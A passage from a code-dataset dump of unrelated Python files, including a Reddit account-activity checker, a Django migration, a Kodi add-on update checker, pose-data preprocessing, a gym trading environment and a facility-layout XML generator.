float(headers[\"x-ratelimit-remaining\"])\n ratelimitReset = float(headers[\"x-ratelimit-reset\"])\n if ratelimitRemaining < 10:\n print(\"WARNING: ratelimit close, sleep for \"+str(ratelimitReset)+\"s\")\n time.sleep(ratelimitReset)\n except:\n print(\"ERROR reading ratelimit, wait 300s\")\n time.sleep(300)\n\n\n\n\n####################\n###### Set Up ######\n####################\n\n# Set user agent\nheaders = requests.utils.default_headers()\nheaders.update({'User-Agent': conf['user_agent']})\n\n# Auth and get token\nauth=HTTPBasicAuth(conf['auth_id'], conf['auth_secret'])\nurl = 'https://www.reddit.com/api/v1/access_token'\ndata = {'grant_type': 'refresh_token', 'refresh_token': conf['refresh_token']}\nx = requests.post(url, data = data, auth = auth, headers = headers)\nresponse = json.loads(x.text)\naccess_token = response['access_token']\n\n# update header\nheaders.update({'Authorization': 'bearer '+access_token})\nprint(\"token refreshed: \"+x.text)\n\n\n###################\n#### Main loop ####\n###################\n\n\ntotal_str = str(len(users))\n\nurlbase = 'https://oauth.reddit.com/user/'\n\n\nif startPos == 0:\n with open(os.path.join(outputPath,outputActiveFile),'w') as file:\n file.write(\"\")\n with open(os.path.join(outputPath,outputOldFile),'w') as file:\n file.write(\"\")\n with open(os.path.join(outputPath,outputDeadFile),'w') as file:\n file.write(\"\")\n with open(os.path.join(outputPath,outputBugFile),'w') as file:\n file.write(\"\")\n\n\nactiveFile = open(os.path.join(outputPath,outputActiveFile),'a')\noldFile = open(os.path.join(outputPath,outputOldFile),'a')\ndeadFile = open(os.path.join(outputPath,outputDeadFile),'a')\nbugFile = open(os.path.join(outputPath,outputBugFile),'a')\n\n\nactive = 0\nold = 0\ndead = 0\nbug = 0\n\nfor i in range(startPos,min(stopPos,len(users))):\n user = users[i]\n x = None\n while x == None:\n try:\n x = requests.get(urlbase+user, headers = headers, timeout=10)\n except requests.Timeout:\n print(\"TIMEOUT, retry\")\n x = None\n timestamp = getLatestTimestamp(x.text)\n outstring = str(i).rjust(len(total_str), '0')+\"/\"+total_str+\": \"+user+\" | \"\n if(timestamp == -2):\n outstring+=\"BUG\"\n bugFile.write('\"'+user+'\",\\n')\n bug += 1\n elif(timestamp == -1):\n outstring+=\"DEAD\"\n deadFile.write('\"'+user+'\",\\n')\n dead += 1\n elif(timestamp < timestamp_cutoff):\n outstring+=\"OLD\"\n oldFile.write('\"'+user+'\",\\n')\n old += 1\n else:\n outstring+=\"Active\"\n activeFile.write('\"'+user+'\",\\n')\n active += 1\n print(outstring)\n waitIfNeeded(x) # prevent too many request\n\n\nactiveFile.close()\noldFile.close()\ndeadFile.close()\nbugFile.close()\n\nprint(str(active)+\" active accounts\")\nprint(str(old)+\" old accounts\")\nprint(str(dead)+\" dead accounts\")\nprint(str(bug)+\" bug accounts\")","sub_path":"activeUserTest/1_activeUserTest.py","file_name":"1_activeUserTest.py","file_ext":"py","file_size_in_byte":4648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"634713760","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('app', '0013_auto_20160511_0649'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='booking',\n name='is_survey_done',\n ),\n migrations.AlterField(\n model_name='booking',\n name='date_for_survey',\n field=models.DateField(default=datetime.date(2016, 5, 25)),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='booking',\n name='date_of_moving',\n field=models.DateField(default=datetime.datetime(2016, 5, 25, 18, 17, 58, 682684)),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='booking',\n name='status',\n field=models.IntegerField(default=3, choices=[(0, b'Completed'), (1, b'Cancelled'), (2, b'Accepted'), (3, b'Received'), (4, b'Survey Done')]),\n preserve_default=True,\n ),\n ]\n","sub_path":"app/migrations/0014_auto_20160525_1817.py","file_name":"0014_auto_20160525_1817.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"298792569","text":"from astropy.io import fits\r\nimport matplotlib.pyplot as plt\r\nimport numpy\r\nfrom scipy import stats\r\nfrom math import log, sqrt, e\r\n\r\nfiles = []\r\nfor i in range(1, 6+1):\r\n files.append(\"qf15_obs5_dark\"+str(i)+\".Combined.fit\")\r\n\r\nim1 = fits.getdata(files[0])\r\nim2 = fits.getdata(files[1])\r\nim3 = fits.getdata(files[2])\r\nim4 = fits.getdata(files[3])\r\nim5 = fits.getdata(files[4])\r\nim6 = fits.getdata(files[5])\r\n\r\nk = 1.38*10**(-23) #Boltzmann's constant\r\n##lnDe0Matrix = numpy.zeros(shape = (len(im1),len(im1[0]))) \r\n##deltaEMatrix = numpy.zeros(shape = (len(im1),len(im1[0])))\r\nlnDe0Matrix = []\r\ndeltaEMatrix = []\r\nDarkCurrs = []\r\nnegSlopes = []\r\nintercepts = []\r\nx = [1/(273+19),\r\n 1/(273+14),\r\n 1/(273+9),\r\n 1/(273+4),\r\n 1/(273-1),\r\n 1/(273-6)]\r\nfor r in range(len(im1)):\r\n if r%10 == 0:\r\n print(r)\r\n for c in range(len(im1[0])):\r\n Deinpix = []\r\n ##sumDe0 = 0\r\n ##sumDe0 += im1[r][c]\r\n Deinpix.append(im1[r][c])\r\n ##sumDe0 += im2[r][c]\r\n Deinpix.append(im2[r][c])\r\n ##sumDe0 += im3[r][c]\r\n Deinpix.append(im3[r][c])\r\n ##sumDe0 += im4[r][c]\r\n Deinpix.append(im4[r][c])\r\n ##sumDe0 += im5[r][c]\r\n Deinpix.append(im5[r][c])\r\n ##sumDe0 += im6[r][c]\r\n Deinpix.append(im6[r][c])\r\n\r\n slope, intercept, r_value, p_value, std_err = stats.linregress(x, Deinpix)\r\n negSlopes.append(-slope)\r\n intercepts.append(intercept)\r\n\r\n deltaE = -1*slope*k\r\n lnDe0 = intercept\r\n\r\n ##lnDe0Matrix[r][c] = lnDe0\r\n ##deltaEMatrix[r][c] = deltaE\r\n lnDe0Matrix.append(lnDe0)\r\n deltaEMatrix.append(deltaE)\r\n\r\nslope, intercept, r_value, p_value, std_err = stats.linregress(deltaEMatrix, lnDe0Matrix)\r\n\r\nEmn = 1/slope\r\n\r\nTmn = Emn/k\r\nprint(Tmn)\r\n\r\nslope, intercept, r_value, p_value, std_err = stats.linregress(negSlopes, intercepts)\r\nplt.plot(negSlopes, intercepts, \"ro\", markersize=1)\r\nx = numpy.linspace(x[0], x[-1], 100000)\r\ny = slope*x+intercept\r\nplt.plot(x, y, linestyle = \"-\", label = \"Fit line\", linewidth = 1)\r\nplt.title(\"Cloudy Night 2: Pixel Line Intercepts vs Slopes\")\r\nplt.ylabel(\"Intercepts\")\r\nplt.xlabel(\"Slopes\")\r\nplt.show()\r\n","sub_path":"Observations/July 07 2019/Trimmed/isokinetic_temp.py","file_name":"isokinetic_temp.py","file_ext":"py","file_size_in_byte":2207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"23458116","text":"# -*- coding: utf-8 -*-\n\nimport xbmc\nimport urllib2\nimport xbmcaddon\nimport urllib\nimport os\nimport inspect\nfrom distutils.version import LooseVersion\n\ntry:\n from koding import Notify\nexcept Exception as e:\n print(e)\n\n\ndef caller_name():\n frame=inspect.currentframe()\n frame=frame.f_back.f_back\n code=frame.f_code\n return code.co_filename\n\ndef Log(*args, **kwargs):\n message = ''\n if len(args) > 1:\n for a in args:\n message += str(a) + \" - \"\n else:\n for a in args:\n message = str(a)\n frame = inspect.currentframe().f_back\n line = \"\"\n func = \"\"\n caller_mod = caller_name()\n if '\\\\' in caller_mod:\n try: caller = caller_mod.rsplit('\\\\', 1)[1]\n except: caller = caller_mod\n else:\n try: caller = caller_mod.rsplit('/', 1)[1]\n except: caller = caller_mod\n showFunc = kwargs.get('showFunc', True)\n if showFunc:\n func = str(inspect.getframeinfo(frame)[2])\n showLine = kwargs.get('showLine', True)\n if showLine:\n line = \"Line \" + str(frame.f_lineno)\n line = \"[{}]\".format(line)\n caller = caller.split(\".py\")[0]\n info = \"TGSERVICE [{}.{}]\".format(caller, func) + \" - \" + line + ' - '\n xbmc.log(info + message, 2)\n\n\ndef url_exists(url):\n request = urllib2.Request(url)\n request.get_method = lambda: 'HEAD'\n try:\n urllib2.urlopen(request)\n Log(\"Url is good: {}\".format(url))\n return True\n except:\n try:\n Notify(title='[COLORlimegreen]Hub[/COLOR]', message=\"Unable to reach {}\".format(url), duration=2000)\n except Exception as e:\n print(e)\n Log(\"Unable to reach: {}\".format(url))\n return False\n\n#### Addon Update Check ######\n\ndef check_addon_latest_ver(addonID, repo_addonsfile_url):\n addonline = 'addon id=\"%s\"' % (addonID)\n saved = xbmc.translatePath(\"special://home/userdata/repoaddonsfile.txt\")\n if not url_exists(repo_addonsfile_url):\n return False\n urllib.urlretrieve(repo_addonsfile_url, saved)\n if os.path.exists(saved):\n with open(saved) as f:\n content = f.readlines()\n for line in content:\n line = line.strip('\\n')\n line = line.strip('\\r')\n if addonline in line:\n prever = line.split('version=\"', 1)[1]\n ver = prever.split('\" provider', 1)[0]\n f.close()\n try:\n os.remove(saved)\n except:\n pass\n return ver\n else:\n print (\"################# check_addon_latest_ver(): path 'saved' doesn't exist. saved = %s ###################\" % saved)\n\n\ndef check_addon_current_ver(addonID):\n Addon = xbmcaddon.Addon(addonID)\n ver = Addon.getAddonInfo('version')\n return ver\n\n\ndef addon_update_avail(addonID, repo_addonsfile_url):\n current = check_addon_current_ver(addonID)\n latest = check_addon_latest_ver(addonID, repo_addonsfile_url)\n Log(\"AddonID: {}\".format(addonID), \"Current: {}\".format(current), \"Latest: {}\".format(latest))\n if not latest:\n Log()\n return False\n elif compare_versions(current, latest):\n Log(addonID, \"Update Required\")\n return True\n else:\n Log()\n return False\n\ndef compare_versions(current, latest):\n if LooseVersion(current) < LooseVersion(latest):\n return True\n else:\n return False\n","sub_path":"script.tgtv/lib/tgtvservice/common_stuff.py","file_name":"common_stuff.py","file_ext":"py","file_size_in_byte":3443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"606409444","text":"import numpy as np\nfrom data import data_utils\n\n# 动作列表\nactions = [\"walking\", \"eating\", \"smoking\", \"discussion\", \"directions\",\n \"greeting\", \"phoning\", \"posing\", \"purchases\", \"sitting\",\n \"sittingdown\", \"takingphoto\", \"waiting\", \"walkingdog\",\n \"walkingtogether\"]\n# 主要关节点\nH36M_MAJOR_JOINTS = [0, 1, 2, 3, 4, 6, 7, 8, 9, 11, 12, 13, 14, 16, 17, 18, 19, 24, 25, 26, 27]\n\nH36M_MAJOR = []\nfor i in H36M_MAJOR_JOINTS:\n H36M_MAJOR.append(3*i)\n H36M_MAJOR.append(3 * i + 1)\n H36M_MAJOR.append(3 * i + 2)\n\ndef process(data_dir, actions, out_dir, H36M_MAJOR_JOINTS):\n trainortest = ['train', 'test']\n for action in actions:\n for dir in trainortest:\n data = np.load(\"{}/{}/{}.npy\".format(data_dir, dir, action))\n n, l, d = data.shape\n assert d == 99, \"not 99 dim\"\n data = data[:, :, 3:] # 去掉开头的根节点\n data = data[..., H36M_MAJOR]\n data = data.reshape(n, l, 3, -1)\n data = data.transpose(0, 2, 1, 3)\n print(data.shape)\n np.save(\"{}/{}/{}.npy\".format(out_dir, dir, action), data)\n\ndef load_data(data_dir, action, addonedim = True, onehot = False):\n # 暂时没有实现对action的onehot编码,暂时用不到\n # data_all = []\n for act in action:\n data = np.load('{}/{}.npy'.format(data_dir, act))\n if addonedim:\n data = data[...,np.newaxis]\n print(data.shape)\n # data_all.append(data)\n # data_all = np.array(data_all)\n return data\n\ndef UnNormalizeData(normalizedData, data_mean, data_std, actions, one_hot):\n dimensions_to_ignore = []\n lista = [i +1 for i in H36M_MAJOR_JOINTS]\n for i in range(99):\n if i // 3 in lista:\n continue\n dimensions_to_ignore.append(i)\n\n T = normalizedData.shape[0]\n D = data_mean.shape[0]\n\n origData = np.zeros((T, D), dtype=np.float32)\n dimensions_to_use = []\n for i in range(D):\n if i in dimensions_to_ignore:\n continue\n dimensions_to_use.append(i)\n dimensions_to_use = np.array(dimensions_to_use)\n\n if one_hot:\n origData[:, dimensions_to_use] = normalizedData[:, :-len(actions)]\n else:\n origData[:, dimensions_to_use] = normalizedData\n\n # potentially ineficient, but only done once per experiment\n stdMat = data_std.reshape((1, D))\n stdMat = np.repeat(stdMat, T, axis=0)\n meanMat = data_mean.reshape((1, D))\n meanMat = np.repeat(meanMat, T, axis=0)\n origData = np.multiply(origData, stdMat) + meanMat\n return origData\n\ndef denormalize_and_convert_to_euler( data, data_mean, data_std, actions, one_hot ):\n \"\"\"\n Denormalizes data and converts to Euler angles\n (all losses are computed on Euler angles).\n\n Args\n data: dictionary with human poses.\n data_mean: d-long vector with the mean of the training data.\n data_std: d-long vector with the standard deviation of the training data.\n dim_to_ignore: dimensions to ignore because the std is too small or for other reasons.\n actions: list of strings with the actions in the data dictionary.\n one_hot: whether the data comes with one-hot encoding.\n\n Returns\n all_denormed: a list with nbatch entries. Each entry is an n-by-d matrix\n that corresponds to a denormalized sequence in Euler angles\n \"\"\"\n\n all_denormed = []\n\n # expmap -> rotmat -> euler\n for i in np.arange( data.shape[0] ):\n denormed = UnNormalizeData(data[i,:,:], data_mean, data_std, actions, one_hot )\n\n for j in np.arange( denormed.shape[0] ):\n for k in np.arange(3,97,3):\n denormed[j,k:k+3] = data_utils.rotmat2euler( data_utils.expmap2rotmat( denormed[j,k:k+3] ))\n\n all_denormed.append( denormed )\n\n return np.array(all_denormed)\n\n\nif __name__ == \"__main__\":\n data_dir = './h36m/temp'\n out_dir = './h36m/processed'\n\n\n process(data_dir, actions, out_dir, H36M_MAJOR_JOINTS )\n","sub_path":"data/processh36m.py","file_name":"processh36m.py","file_ext":"py","file_size_in_byte":3938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"77467303","text":"import csv\nimport time\nimport gym\nimport os\nfrom gym import spaces\nfrom gym.utils import seeding\nfrom torch import initial_seed\nimport yfinance as yf\nimport datetime\nimport pandas as pd\nimport numpy as np\nimport matplotlib.animation as ani\nimport matplotlib.pyplot as plt\n\nclass DayTradingEnv(gym.Env):\n metadata = {'render.modes': ['human']}\n MAX_FLOAT_VAL = np.inf\n reward_range = (-np.inf, np.inf)\n\n\n def __init__(self, start_balance=100000, interval='1d', start_day='2020-01-01', end_day='2020-08-01', tickers=['AAPL', 'MSFT', 'AMZN']):\n\n # Finances\n self.start_balance = start_balance\n self.balance = start_balance\n self.net_worth = start_balance\n self.tickers = tickers\n self.portfolio = np.zeros((2, len(self.tickers)), dtype=np.float32) # 0: purchase price 1: amount\n self.ledger = {'Date':[],'Stock':[],'Shares':[],'Total':[],'Balance':[],'Net Worth':[]}\n self.last_price = []\n self.holdAction = len(self.tickers) * 20\n self.done = False \n self.isDataDownloaded = False\n\n # Time\n self.start_day = start_day\n self.end_day = end_day\n self.steps = 0\n self.time = start_day\n self.interval = interval # valid intervals: 1m,2m,5m,15m,30m,60m,90m,1h,1d,5d,1wk,1mo,3mo\n self.start_file = None\n self.end_file = None\n\n # Data\n self.total_trades = 0\n self.dtype = np.float64\n self.stockLocation = []\n self.columnNames = []\n\n # Actions and Observations\n self.action_space = spaces.Discrete(len(self.tickers) * 20)\n self.observation_space = spaces.Box(low=-np.inf, high=np.inf, shape=(7, len(self.tickers)))\n\n\n # step function to take current action\n def step(self, action):\n self.steps += 1\n value = self.take_action(action)\n reward = self.get_reward(value)\n observation = self.observe_next_day()\n if self.time == self.end_day or self.done == True:\n self.reset()\n\n return observation, reward, self.done, {}\n\n\n def take_action(self, action): \n stockMovement = []\n share = self.get_stock_to_buy(action)\n percentOfMoneyToSpend = self.getBuyPercent(action)\n\n # buy stock\n if action < len(self.tickers) * 10: # BUY\n # print('BUY {}'.format(self.tickers[share]))\n currentPrice = float(self.last_price[share]) \n sharesMoved = (percentOfMoneyToSpend * self.balance)/currentPrice\n transaction = currentPrice * sharesMoved\n self.balance -= transaction\n\n if self.portfolio[1, share] != 0:\n purchasePrice = self.portfolio[0, share]\n newPurchasePrice = currentPrice * sharesMoved + purchasePrice * self.portfolio[1, share]\n self.portfolio[1, share] += sharesMoved\n self.portfolio[0, share] = newPurchasePrice / self.portfolio[1, share]\n\n else:\n self.portfolio[0, share] = currentPrice\n self.portfolio[1, share] += sharesMoved\n stockMovement.append([self.portfolio[1, share], currentPrice, sharesMoved, action])\n #self.to_ledger(self.tickers[share], sharesMoved, 0-transaction)\n\n # sell stock\n elif action >= len(self.tickers) * 10 and action != self.holdAction:\n share -= len(self.tickers)\n # print('SELL {}'.format(self.tickers[share]))\n purchasePrice = self.portfolio[0, share]\n currentPrice = float(self.last_price[share])\n sharesMoved = percentOfMoneyToSpend * self.portfolio[1, share]\n\n if sharesMoved != 0:\n transaction = currentPrice * sharesMoved\n self.balance += transaction\n self.portfolio[1, share] -= sharesMoved\n #self.to_ledger(self.tickers[share], sharesMoved, 0-transaction)\n stockMovement.append([purchasePrice, currentPrice, sharesMoved, action]) \n\n # hold stock\n else:\n stockMovement.append([0, 0, 0, action])\n # print('HOLD')\n\n return stockMovement\n\n\n # reward function\n # heavily needs to be redone\n def get_reward(self, values): \n # rewards for share profit relative to amount moved, not entire value\n reward = 0\n for item in values:\n oldPrice = item[0]\n currentPrice = item[1]\n sharesMoved = item[2]\n action = item[3]\n if not sharesMoved and action != self.holdAction:\n reward -= .999\n elif sharesMoved != 0 and action > len(self.tickers)*10:\n reward += (currentPrice * sharesMoved) / (oldPrice * sharesMoved) -1\n reward = reward/len(values)\n\n # print('OLD PRICE: %s' % oldPrice)\n # print('CUR PRICE: %s' % currentPrice)\n # print('SHARES MOVED: %f' % sharesMoved)\n return reward\n\n\n # observes the next state of the enviornment\n # returns observation of current enviornment\n # ----> flattened since openbaselines check_env() function recommended\n def observe_next_day(self):\n\n # names of yfinance headers in csv file\n desired_rows = ['Open', 'Close', 'High', 'Low', 'Volume']\n \n # creating the observation space to manipulate and return as \"obs\"\n obs = np.zeros((len(desired_rows) + 2, len(self.tickers)), dtype=self.dtype) # +2 shares & price\n for countX, stock_location in enumerate(self.stockLocation):\n\n # reads stock data by day\n # decrements csv data to read the first line as current date\n current_data = pd.read_csv(stock_location, names=self.columnNames, skiprows=self.steps, nrows=1)\n\n # setting self.time to check when to end enviornment as data has run out\n # FIX: try case because I am unsure which column name yfinance will use\n try:\n self.time = current_data['Date'][0]\n except:\n self.done = True\n obs = np.zeros((len(desired_rows) + 2, len(self.tickers)), dtype=self.dtype) # +2 shares & price\n return obs\n\n # assigning values to the observation space \n for countY, headerNameInData in enumerate(desired_rows):\n # uses 0 as value becuse the csv file is decrementing through pd.read_csv above\n obs[countY, countX] = current_data.loc[0, headerNameInData] \n self.last_price.append(current_data.loc[0, headerNameInData])\n\n # assigning proper prices and shares to portfolio\n \n # 6th column as the prices column of \"obs\"\n obs[5, countX] = self.portfolio[0, countX]\n\n # 7th column as the shares column of \"obs\"\n obs[6, countX] = self.portfolio[1, countX]\n\n # .flatten() recommended by stable_baselines3\n return obs\n\n\n def reset(self):\n # resetting the time variable \n self.time = self.start_day\n # print('Reset:')\n\n # So you don't have to redownload the data every run\n if not self.isDataDownloaded:\n self.download_stocks()\n\n # resetting all the values to inital values\n self.net_worth = self.start_balance\n self.balance = self.start_balance\n self.steps = 1\n self.done = False\n self.portfolio = np.zeros((2, len(self.tickers)), dtype=np.float64) # 0: purchase price 1: amount\n self.ledger.clear()\n out = self.observe_next_day()\n return out\n\n\n def to_ledger(self, stock, shares_moved, transaction):\n self.ledger['Date'].append(self.time)\n self.ledger['Stock'].append(self.tickers[stock])\n self.ledger['Shares'].append(shares_moved)\n self.ledger['Total'].append(transaction)\n self.ledger['Balance'].append(self.balance)\n self.ledger['Net Worth'].append(self.net_worth)\n\n\n def download_stocks(self):\n # clearing stored old stock locations\n self.stockLocation.clear()\n\n # downloading each selected ticker\n for count, stock in enumerate(self.tickers):\n print(\"Downloading: \" + stock)\n stockData = yf.Ticker(stock)\n\n # creating data/ directory\n if not os.path.exists('./data'):\n os.mkdir('./data')\n\n # naming saving location for stock\n stockFileName = 'data/{}.csv'.format(stock)\n stockData.history(start=self.start_day, end=self.end_day, interval=self.interval).to_csv(stockFileName)\n if not count:\n for i in pd.read_csv(stockFileName).tail(1).Date:\n self.end_day = i\n\n # assigning column names \n self.columnNames.clear()\n downloadedFileHeaders = pd.read_csv(stockFileName, nrows=1)\n for col in downloadedFileHeaders.columns:\n self.columnNames.append(col)\n self.stockLocation.append(stockFileName)\n\n # prevents code from downloading the same data every reset\n self.isDataDownloaded = True\n\n\n # returns percent of money to spend on chosen stock\n def getBuyPercent(self, action):\n # number in 1's place is percent of self.balance to spend on chosen stock\n percentOfMoneySpent = action % 10\n\n # if number is 0, it means to invest 100% of money in stock\n if not percentOfMoneySpent:\n percentOfMoneySpent = 10.0\n buyPercent = percentOfMoneySpent / 10.0\n return buyPercent\n\n\n # returns share to be purchased\n def get_stock_to_buy(self, action):\n # share is determined by the digits after the 1's place \n shareToBuy = action // 10\n return shareToBuy\n\n\n def seed(self, seed=None):\n return\n\n def __enter__(self):\n return self\n\n def __exit__(self):\n self.close()\n return False\n","sub_path":"gym_trading/envs/trading_env.py","file_name":"trading_env.py","file_ext":"py","file_size_in_byte":9934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"453236535","text":"import pygame as pg\nimport constants\nimport random\nimport time\n\n\nclass Facts:\n\n def __init__(self):\n self.data = []\n f = open('tips_and_facts.txt', 'r')\n self.data = f.read().split('.\\n')\n f.close()\n self.font = pg.font.SysFont('Comic Sans MS', 30)\n self.rand = random.randint(0, 17)\n self.t = time.time()\n\n def draw(self, screen):\n back = pg.Surface((800, 30))\n if abs(self.t - time.time()) > 5:\n self.rand = random.randint(0, len(self.data) - 1)\n self.t = time.time()\n text = self.font.render(self.data[self.rand], 1, (0, 0, 0))\n back.fill(constants.GOLD)\n back.blit(text, (0, 0))\n screen.blit(back, (0, 50))\n\n\n\n\n","sub_path":"pacman/facts.py","file_name":"facts.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"166988778","text":"import sys\n# sys.path.extend(['./copct-master','./dananau-pyhop-195ab6320571'])\nimport math\n\n\ndef toXML(state, xml_file_path, tabletop_xspan, tabletop_yspan, layout_xspan, layout_yspan):\n layout_xcoord = str(((layout_xspan/2)+1)*-1)\n layout_ycoord = str(0)\n #print 'xcoord', layout_xcoord\n #print 'ycoord', layout_ycoord\n with open(xml_file_path,'w') as xml:\n xml.write('\\n')\n xml.write('\\n' %(str(tabletop_xspan),str(tabletop_yspan)))\n xml.write('\\n')\n xml.write('\\n')\n xml.write('\\n'%(str(layout_xspan)))\n xml.write('\\n'%(str(layout_yspan)))\n xml.write('\\n'%(layout_xcoord, layout_ycoord))\n xml.write('\\n')\n \n for obj in state:\n if state[obj][0] == 'block':\n xml.write('\\n'%state[obj][5])\n \n xml.write('\\n')\n\n\ndef buildState(state, names, colors, size):\n layoutX = state['room'][1];\n layoutY = state['room'][2];\n halfX = layoutX+2;\n halfY = layoutY+2;\n #print 'XXXXXX', layoutX\n blockDims = {};\n startX = 1;\n startY = 1;\n z = 0.5;\n k = 1;\n towerHeightCounter=1;\n numRooms = len(names);\n inputIndex = -1;\n \n for i in range(1,numRooms+1):\n inputIndex = inputIndex + 1\n for j in range(1,int(size[inputIndex])+1):\n #print 'name ',names[inputIndex]\n #print 'color ',colors[inputIndex]\n state[names[inputIndex]+str(towerHeightCounter)] = ['block', startX, startY, z*towerHeightCounter, 0, colors[inputIndex]]\n blockDims[k] = [startX, startY, z*towerHeightCounter]\n k = k+1 \n towerHeightCounter = towerHeightCounter + 1;\n if towerHeightCounter>int(size[inputIndex]):\n towerHeightCounter=1;\n break;\n numRooms = numRooms-1;\n k = k + 1;\n startX = startX+1;\n \n #4,3\n if startX >= halfX and startY+1 <= halfY:\n startX = 1;\n startY = startY +1;\n if startY == halfY:\n k = k+1;\n break;\n elif startX+1 > halfX and startY+1 > halfY:\n k = k+1;\n break;\n \n startX = 1;\n startY = -1;\n halfY = halfY * -1;\n towerHeightCounter = 1;\n #print 'numRooms between loops: ', numRooms\n \n for i in range(1,numRooms+1):\n inputIndex = inputIndex + 1\n for j in range(1,towerHeight+1):\n state[names[inputIndex]+str(towerHeightCounter)] = ['block', startX, startY, z*towerHeightCounter, 0, colors[inputIndex]]\n blockDims[k] = [startX, startY, z*towerHeightCounter]\n k = k+1\n \n towerHeightCounter = towerHeightCounter + 1;\n if towerHeightCounter>towerHeight:\n towerHeightCounter=1;\n break;\n numRooms = numRooms-1;\n k = k + 1;\n startX = startX+1;\n if startX+1 > halfX and startY-1 > halfY:\n startX = 1;\n startY = startY-1;\n if startY+1 == halfY:\n k = k+1;\n \n \n elif startX+1 > halfX and startY-1 < halfY:\n k = k+1;\n \n \n return state;\n\nif __name__ == '__main__':\n \n # Infer intentions from demo\n #demo = load_demo(demo_directory='./SMILE-1.1.0/room_demo/')\n \n if sys.argv>1:\n for arg in sys.argv:\n setupStr = arg;\n \n roomBuilder = {}\n rooms = setupStr.split(':')\n k = 0\n destFilename = rooms[-1]\n state = {}\n roomNamesArr = []\n roomColorsArr = []\n roomSizeArr = []\n mainRoomArr = rooms[0].split(\",\") # [room, xspan, yspan]\n state['room'] = [mainRoomArr[0], float(mainRoomArr[1]), float(mainRoomArr[2])]\n i = 1;\n while i < len(rooms)-1:\n roomBuilder[k] = rooms[i].split(',') # 0: [paintRoom,4000,blue]\n roomNamesArr.append(roomBuilder[k][0])\n roomColorsArr.append(roomBuilder[k][1])\n roomSizeArr.append(roomBuilder[k][2])\n i=i+1\n\n finalState = {}\n finalState = buildState(state, roomNamesArr, roomColorsArr, roomSizeArr)\n #for key in state:\n #print key, state[key]\n\n layoutX = state['room'][1];\n layoutY = state['room'][2];\n tabletopX = (layoutX+2) *2;\n tabletopY = (layoutY+2);\n \n # export to xml for smile viewing\n toXML(state,destFilename, tabletopX, tabletopY, layoutX, layoutY)\n\n\n","sub_path":"Facility Layout Scripts/generateMultiple.py","file_name":"generateMultiple.py","file_ext":"py","file_size_in_byte":4985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"551209949","text":"import sys, os\nfrom setuptools import setup, find_packages\nfrom setuptools.extension import Extension\nfrom Cython.Build import cythonize\nimport numpy as np\n\ndef scandir(dir, files=[]):\n for file in os.listdir(dir):\n path = os.path.join(dir, file)\n if os.path.isfile(path) and path.endswith(\".pyx\"):\n files.append(path.replace(os.path.sep, \".\")[:-4])\n elif os.path.isdir(path):\n scandir(path, files)\n return files\n\n# generate an Extension object from its dotted name\ndef makeExtension(extName):\n extPath = extName.replace(\".\", os.path.sep)+\".pyx\"\n print('path:', extName, extPath)\n return Extension(\n extName,\n [extPath],\n include_dirs = [\".\", np.get_include()], # adding the '.' to include_dirs is CRUCIAL!!\n extra_compile_args = [\"-Wall\"],\n extra_link_args = ['-g', '-Wno-cpp', '-ffast-math', '-O2'],\n define_macros = [('NPY_NO_DEPRECATED_API', 'NPY_1_7_API_VERSION')],\n )\n\n# get the list of extensions\nextNames = scandir(\"numflow\")\n\n# and build up the set of Extension objects\nextensions = [makeExtension(name) for name in extNames]\n\nsetup(\n name = 'numflow', # How you named your package folder (MyLib)\n packages = ['numflow', 'numflow.cython'], # Chose the same as \"name\"\n version = '0.0.5', # Start with a small number and increase it with every change you make\n license='MIT', # Chose a license from here: https://help.github.com/articles/licensing-a-repository\n description = 'Yet another visualization package', # Give a short description about your library\n author = 'Vojtech Tomas', # Type in your name\n author_email = 'tomas@vojtatom.cz', # Type in your E-Mail\n url = 'https://github.com/vojtatom/numflow', # Provide either the link to your github or to your website\n download_url = 'https://github.com/vojtatom/numflow/archive/0.0.5.tar.gz', # I explain this later on\n keywords = ['visualization', 'data', 'flow'], # Keywords that define your package best\n install_requires=[ # dependencies\n 'Cython >= 0.18'\n ],\n classifiers=[\n 'Development Status :: 3 - Alpha', # Chose either \"3 - Alpha\", \"4 - Beta\" or \"5 - Production/Stable\" as the current state of your package\n 'Intended Audience :: Developers', # Define that your audience are developers\n 'Topic :: Scientific/Engineering :: Visualization',\n 'License :: OSI Approved :: MIT License', # Again, pick a license\n 'Programming Language :: Python :: 3', #Specify which pyhton versions that you want to support\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n ],\n #packages = [\"visual.modules.numeric\", \"visual.modules.numeric.data\", \"visual.modules.numeric.math\"],\n ext_modules = cythonize(extensions),\n include_package_data=True\n)","sub_path":"pypi_install_script/numflow-0.0.5.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"222903637","text":"import os\nimport time\nimport requests\nimport telebot\n\nfrom generation_image.main import Post\nfrom telegram_bot.settings import *\nfrom utils_base import get_no_push_posts, set_post_true\n\nbot = telebot.TeleBot(TOKEN)\n\n\ndef push_post() -> None:\n for post in get_no_push_posts('teleg_flag'):\n message = f'{post[1]}\\n\\n{post[2]}\\n\\nОригинальная статья: {post[6]}'\n files = []\n paths = []\n set_post_true(post[0], key='teleg_flag')\n if post[6]:\n urls = post[5].split('\\n')\n if len(urls) == 1 and len(message) <= 600:\n img_post = Post(int(post[0]))\n 